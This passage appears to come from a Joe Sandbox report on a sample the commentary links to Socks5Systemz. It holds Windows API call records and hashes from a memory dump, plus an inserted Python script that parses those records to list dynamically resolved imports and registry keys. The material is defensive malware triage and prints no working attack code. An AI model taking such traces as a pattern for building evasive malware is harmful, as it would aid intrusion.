                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                • API String ID: 47109696-2631785700
                                                                                • Opcode ID: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                                • Instruction ID: 5fc53f2980ca067f7fdefaa7aa50a153e5e830959166a8c5adde0da5508e813c
                                                                                • Opcode Fuzzy Hash: 2bb6d2a90fde3dca571cbffa0de55d15307f7e9fe95e0bdc468a8876b40318f9
                                                                                • Instruction Fuzzy Hash: 97F0AF35720150DBCB10EF5AE885B4E6298DB99396F50403BB985CB263C77CCC06CA99
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                • API String ID: 1646373207-4063490227
                                                                                • Opcode ID: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                                • Instruction ID: 1097081faf8e12b72459453f22f39748745641366cc83a46a0cb0e3cd7246884
                                                                                • Opcode Fuzzy Hash: 9f11ee2d5e3000e0cdd038ccf0fc88bc65f7f941c6d0e4eb05ced4219cc1a029
                                                                                • Instruction Fuzzy Hash: 5FE04FE1B40B1112D71066BA5C82B6B158E4B84724F90443B3994E62C3DDBCD9885A5D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                • API String ID: 1646373207-260599015
                                                                                • Opcode ID: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                                                • Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
                                                                                • Opcode Fuzzy Hash: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
                                                                                • Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: NotifyWinEvent$user32.dll
                                                                                • API String ID: 1646373207-597752486
                                                                                • Opcode ID: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                                                • Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
                                                                                • Opcode Fuzzy Hash: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
                                                                                • Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                                • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                • API String ID: 1646373207-834958232
                                                                                • Opcode ID: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                                                • Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
                                                                                • Opcode Fuzzy Hash: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
                                                                                • Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
                                                                                APIs
                                                                                  • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                                                  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                                                • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
                                                                                • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                • API String ID: 2238633743-2683653824
                                                                                • Opcode ID: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                                                • Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
                                                                                • Opcode Fuzzy Hash: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
                                                                                • Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
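
The records above are the kind of thing an analyst reads for two facts first: which imports the sample resolves at run time (a GetModuleHandleA/LoadLibraryA call followed by GetProcAddress, the behaviour the report summary flags as "Contains functionality to dynamically determine API calls") and which registry keys it opens. The script below is an added example written for this page; it is not Joe Sandbox code and not code from the sample. Its input is a constructed excerpt made from API lines copied from the records in this section. One caveat it has to handle: the argument columns in these records read as raw stack slots rather than decoded parameters (note how GetProcAddress shows `kernel32.dll` as its second argument while the symbol name `GetSystemWow64DirectoryA` sits in the preceding GetModuleHandleA line, whereas in the uxtheme block the symbol is in the GetProcAddress line itself), so the pairing logic takes the symbol from whichever of the two lines carries an identifier.

```python
"""Parse Joe Sandbox 'APIs' records and list run-time resolved imports and
registry keys opened. Added example for this page; not Joe Sandbox code and
not code from the analysed sample."""
import re
from collections import defaultdict

# Constructed input: lines copied from the records in this report, one record
# per "APIs" heading. Backslashes in the registry path are doubled for Python.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\\CurrentControlSet\\Control\\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000,00453BE9,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FD9,00000000), ref: 0042D91A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78
APIs
  • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
APIs
  • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
  • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
• GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, Api.MODULE,
# an optional "(args)" group (GetTickCount has none; MoveFileExA has nested
# parentheses, hence the greedy .*), then "ref: <address>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
SYMBOL_RE = re.compile(r"^[A-Za-z_]\w*$")   # plausible exported-function name
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # a raw 32-bit stack value
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}


def parse_records(text):
    """Split the dump into records (one per 'APIs' heading) of parsed calls."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            args = m["args"].split(",") if m["args"] is not None else []
            current.append({"api": m["api"], "mod": m["mod"], "args": args,
                            "ref": m["ref"], "sub": m["sub"]})
    return records


def looks_like_symbol(token):
    """Identifier-shaped and not a DLL name ('.') or a raw hex stack value."""
    return bool(SYMBOL_RE.match(token)) and not HEX32_RE.match(token)


def dynamic_imports(records):
    """Pair each loader call with the GetProcAddress calls that follow it in the
    same record. The symbol name is taken from the GetProcAddress line when it
    carries one, otherwise from the second slot of the loader line (the report
    prints stack slots, so the name often shows up there instead)."""
    found = []
    for rec in records:
        pending = None
        for call in rec:
            if call["api"] in LOADERS and call["args"]:
                pending = call
            elif call["api"] == "GetProcAddress" and pending is not None:
                candidates = call["args"][1:2] + pending["args"][1:2]
                symbol = next((c for c in candidates if looks_like_symbol(c)), None)
                if symbol:
                    found.append((pending["args"][0].lower(), symbol, call["ref"]))
    return found


def registry_opens(records):
    """Return (hive, subkey) for every RegOpenKeyEx* / RegCreateKeyEx* call."""
    keys = []
    for rec in records:
        for call in rec:
            if call["api"].startswith(("RegOpenKeyEx", "RegCreateKeyEx")) and len(call["args"]) >= 2:
                keys.append((HIVES.get(call["args"][0], call["args"][0]), call["args"][1]))
    return keys


def summarize(text):
    """Triage summary: record/call counts, resolved imports per DLL, registry keys."""
    records = parse_records(text)
    by_module = defaultdict(list)
    for dll, sym, _ref in dynamic_imports(records):
        by_module[dll].append(sym)
    return {
        "records": len(records),
        "calls": sum(len(r) for r in records),
        "dynamic_imports": dict(by_module),
        "registry": registry_opens(records),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_REPORT)
    for dll, syms in sorted(report["dynamic_imports"].items()):
        print(f"{dll}: {', '.join(syms)}")
    for hive, key in report["registry"]:
        print(f"registry: {hive}\\{key}")
```

Run against the excerpt, the summary attributes GetSystemWow64DirectoryA to kernel32.dll, ShutdownBlockReasonDestroy to user32.dll, OpenThemeData and CloseThemeData to uxtheme.dll, SHPathPrepareForWriteA to shell32.dll, and reports one registry open of HKLM\System\CurrentControlSet\Control\Windows. A weighting note, stated as this editor's assessment rather than anything the report asserts: GetProcAddress stubs for uxtheme, ShutdownBlockReasonDestroy, DisableProcessWindowsGhosting and SHPathPrepareForWriteA, next to a string such as "LoggedMsgBox returned an unexpected value. Assuming Cancel.", are consistent with a Delphi-style installer runtime wrapping the payload, so a hit on "dynamically determine API calls" from these particular records says more about the wrapper than about the Socks5Systemz component the detection names.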
                                                                                APIs
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
                                                                                • FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileNext
                                                                                • String ID:
                                                                                • API String ID: 2066263336-0
                                                                                • Opcode ID: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                                                • Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
                                                                                • Opcode Fuzzy Hash: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
                                                                                • Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
                                                                                APIs
                                                                                  • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
                                                                                  • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
                                                                                • GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CountErrorFileLastMoveTick
                                                                                • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                • API String ID: 2406187244-2685451598
                                                                                • Opcode ID: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                                                • Instruction ID: 8ae0701305b01ce1bca9537847079d861391bf026d2cb8563746cd807755024f
                                                                                • Opcode Fuzzy Hash: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
                                                                                • Instruction Fuzzy Hash: BB4166B0A006098FDB10EFA5D882ADE77B5EF48314F60853BE514BB351D7789A058BA9
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00413D56
                                                                                • GetDesktopWindow.USER32 ref: 00413E0E
                                                                                  • Part of subcall function 00418ED0: 6FA0C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
                                                                                  • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
                                                                                • SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CursorDesktopWindow$Show
                                                                                • String ID:
                                                                                • API String ID: 2074268717-0
                                                                                • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                • Instruction ID: 95de96b99ba854305cf3f6c98da1fc171ffd9c3687d173b50ed20deed18b133b
                                                                                • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                • Instruction Fuzzy Hash: 59411F75600250AFC710DF2AFA85B5677E1EB64319F15817BE404CB365DB38AD81CF98
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
                                                                                • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
                                                                                • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: LoadString$FileMessageModuleName
• String ID:
• API String ID: 704749118-0
APIs
• SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
  • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
• InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
  • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
• IsRectEmpty.USER32(?), ref: 0044E963
• ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
Similarity
• API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
• String ID:
• API String ID: 855768636-0
APIs
• OffsetRect.USER32(?,?,00000000), ref: 00495358
• OffsetRect.USER32(?,00000000,?), ref: 00495373
• OffsetRect.USER32(?,?,00000000), ref: 0049538D
• OffsetRect.USER32(?,00000000,?), ref: 004953A8
Similarity
• API ID: OffsetRect
• String ID:
• API String ID: 177026234-0
APIs
• GetCursorPos.USER32 ref: 00417270
• SetCursor.USER32(00000000), ref: 004172B3
• GetLastActivePopup.USER32(?), ref: 004172DD
• GetForegroundWindow.USER32(?), ref: 004172E4
Similarity
• API ID: Cursor$ActiveForegroundLastPopupWindow
• String ID:
• API String ID: 1959210111-0
APIs
• MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
• MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
• MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
• MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
• UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
• RegisterClassA.USER32(00499598), ref: 0041F4E4
• SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
Similarity
• API ID: Class$InfoLongRegisterUnregisterWindow
• String ID:
• API String ID: 4025006896-0
APIs
• WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
• MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
• GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
• CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
Similarity
• API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
• String ID:
• API String ID: 4071923889-0
APIs
• FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
• LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
• SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
• LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
APIs
• GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
Strings
• Failed to set NTFS compression state (%d)., xrefs: 004700FE
• Setting NTFS compression on directory: %s, xrefs: 004700BB
• Unsetting NTFS compression on directory: %s, xrefs: 004700D3
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
• API String ID: 1452528299-1392080489
APIs
• GetLastError.KERNEL32(?,00000000), ref: 00470899
Strings
• Unsetting NTFS compression on file: %s, xrefs: 0047087F
• Setting NTFS compression on file: %s, xrefs: 00470867
• Failed to set NTFS compression state (%d)., xrefs: 004708AA
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
• API String ID: 1452528299-3038984924
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                                                • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                                                • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
